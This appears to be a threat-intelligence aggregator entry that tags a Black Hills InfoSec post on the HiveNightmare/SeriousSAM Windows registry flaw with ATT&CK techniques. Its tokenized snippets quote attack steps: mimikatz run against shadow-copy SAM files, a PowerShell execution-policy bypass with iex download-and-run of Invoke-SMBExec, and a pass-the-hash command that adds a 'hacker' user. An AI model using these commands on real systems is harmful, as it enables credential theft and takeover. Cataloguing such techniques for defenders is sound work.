TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Black Hills InfoSec

What To Know About Microsoft’s Registry Hive Flaw: #SeriousSAM

BHIS · 2021-07-30 · Read original ↗

ATT&CK techniques detected

4 predictions
T1003.002Security Account Manager
99%
"> = 128gb ) set directory = \? \ globalroot \ device \ harddiskvolumeshadowcopy5 \ windows \ system32 \ config $ directory = “ \? \ globalroot \ device \ harddiskvolumeshadowcopy5 \ windows \ system32 \ config ” : : point mimikatz at the vss backups and filter for the administrat…"
T1569.002Service Execution
77%
"is not a defense here, or in general https : / / amsi. fail / set - executionpolicy bypass - scope process - force ; [ system. net. servicepointmanager ] : : securityprotocol = [ system. net. servicepointmanager ] : : securityprotocol - bor 3072 ; iex ( ( new - object system. net…"
T1003.002Security Account Manager
76%
"what to know about microsoft ’ s registry hive flaw : # serioussam what to know about microsoft ’ s registry hive flaw : # serioussam # hivenightmare / # lolwut jeff mcjunkin * / / what is it? tl ; dr — unpatched privilege escalation in windows 10 in nearly all supported builds. …"
T1550.002Pass the Hash
59%
"##hash / raw / master / invoke - smbexec. ps1 ’ ) ) invoke - thehash - type smbexec - target 127. 0. 0. 1 - username administrator - hash 8846f7eaee8fb117ad06bdd830b7586c - command “ net user hacker tipyourwaiters / add ” invoke - thehash - type smbexec - target 127. 0. 0. 1 - us…"

Summary

#hivenightmare / #lolwut Jeff McJunkin* // What is it? tl;dr — Unpatched privilege escalation in Windows 10 in nearly all supported builds. The vulnerability (CVE-2021–36934) allows an attacker with limited […]

The post What To Know About Microsoft’s Registry Hive Flaw: #SeriousSAM appeared first on Black Hills Information Security, Inc..